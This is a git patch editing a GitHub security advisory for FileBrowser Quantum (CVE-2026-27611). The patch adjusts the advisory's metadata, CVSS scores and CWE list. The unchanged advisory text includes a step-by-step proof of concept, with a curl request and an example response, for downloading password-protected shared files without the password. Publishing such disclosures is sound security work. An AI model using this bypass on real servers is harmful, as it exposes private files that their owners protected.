From 4ceca2abfcebad55f8aba426e50172335b808140 Mon Sep 17 00:00:00 2001
From: Byte <113946747+ByteAfterlife@users.noreply.github.com>
Date: Thu, 9 Apr 2026 13:21:43 -0500
Subject: [PATCH] Improve GHSA-8vrh-3pm2-v4v6

---
 .../2026/02/GHSA-8vrh-3pm2-v4v6/GHSA-8vrh-3pm2-v4v6.json | 9 +++------
 1 file changed, 3 insertions(+), 6 deletions(-)

diff --git a/advisories/github-reviewed/2026/02/GHSA-8vrh-3pm2-v4v6/GHSA-8vrh-3pm2-v4v6.json b/advisories/github-reviewed/2026/02/GHSA-8vrh-3pm2-v4v6/GHSA-8vrh-3pm2-v4v6.json
index 635dca48b9a24..67faed97afb78 100644
--- a/advisories/github-reviewed/2026/02/GHSA-8vrh-3pm2-v4v6/GHSA-8vrh-3pm2-v4v6.json
+++ b/advisories/github-reviewed/2026/02/GHSA-8vrh-3pm2-v4v6/GHSA-8vrh-3pm2-v4v6.json
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-8vrh-3pm2-v4v6",
-  "modified": "2026-02-27T21:42:54Z",
+  "modified": "2026-02-27T21:42:55Z",
   "published": "2026-02-25T16:00:49Z",
   "aliases": [
     "CVE-2026-27611"
@@ -9,10 +9,6 @@
   "summary": "FileBrowser Quantum: Password Protection Not Enforced on Shared File Links ",
   "details": "### Summary\nWhen users share password-protected files, the recipient can completely bypass the password and still download the file.\n\n### Details\nThis happens because the API returns a direct download link in the details of the share, which is accessible to anyone with JUST THE SHARE LINK, even without the password.\n\n### PoC\n1. As an authenticated user, create a share for a file, with a password specified in \"Optional password\" (make sure to allow anonymous access as the PoC doesn't explain how to do this on a share that requires login, but it is also possible to do on a share that requires login, with some small tweaks to the API request)\n2. Copy the first link (the clipboard WITHOUT an arrow) because the second one just completely skips the password without any effort required, which was mentioned in another vulnerability (https://github.com/filebrowser/filebrowser/security/advisories/GHSA-3v48-283x-f2w4)\n\nNow, the link that was copied should look like:\nhttps://yourdomain/public/share/yoursharehash\nexample:\nhttps://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA\n\nNow, make a API request with any api client to GET \nhttps://yourdomain/public/api/shareinfo?hash=(the share hash from the link)\nexample:\nhttps://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA\n\nIf curl is preferred, a (command line based API client), here's the command:\n`curl 'https://yourdomain/public/api/shareinfo?hash=yoursharehash' -H 'Accept: */*'`\nexample:\n`curl 'https://example.com/public/api/shareinfo?hash=ngCZzArOyFHUQBmfbvP-pA' -H 'Accept: */*'`\n\nExample response:\n```\n{\n    \"shareTheme\": \"default\",\n    \"title\": \"Shared files - IMG_20240814_213703451.jpg\",\n    \"description\": \"A share has been sent to you to view or download.\",\n    \"disableSidebar\": false,\n    \"source\": \"/folder\",\n    \"path\": \"/IMG_20240814_213703451.jpg/\",\n    \"downloadURL\": \"https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D\",\n    \"shareURL\": \"https://example.com/public/share/ngCZzArOyFHUQBmfbvP-pA\",\n    \"enforceDarkLightMode\": \"default\",\n    \"viewMode\": \"normal\",\n    \"shareType\": \"normal\",\n    \"sidebarLinks\": [\n        {\n            \"name\": \"Share QR Code and Info\",\n            \"category\": \"shareInfo\",\n            \"target\": \"#\",\n            \"icon\": \"qr_code\"\n        },\n        {\n            \"name\": \"Download\",\n            \"category\": \"download\",\n            \"target\": \"#\",\n            \"icon\": \"download\"\n        }\n    ],\n    \"hasPassword\": true\n}\n```\n\nLook at the downloadURL. It encodes the \"&\" symbol as \"\\u0026\" so just replace \"\\u0026\" with \"&\", example: \nhttps://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA\\u0026token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D\nshould be changed to:\nhttps://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D\n\nThen just copy paste the new link (example: https://example.com/public/api/raw?hash=ngCZzArOyFHUQBmfbvP-pA&token=uEr4nCNarX6FqlzwmBo8X1rRRASbOrMY.sWSARcKhrVKrEJlqiF-l6RjXK9fMEPYZsMc9DCJ96BQ%3D) into any browser, and the file will download. All without giving a password.\n\n### Impact\nThis affects anyone who shares password-protected files.",
   "severity": [
-    {
-      "type": "CVSS_V3",
-      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
-    },
     {
       "type": "CVSS_V4",
       "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"
@@ -68,7 +64,8 @@
   "database_specific": {
     "cwe_ids": [
       "CWE-200",
-      "CWE-288"
+      "CWE-288",
+      "CWE-602"
     ],
     "severity": "HIGH",
     "github_reviewed": true,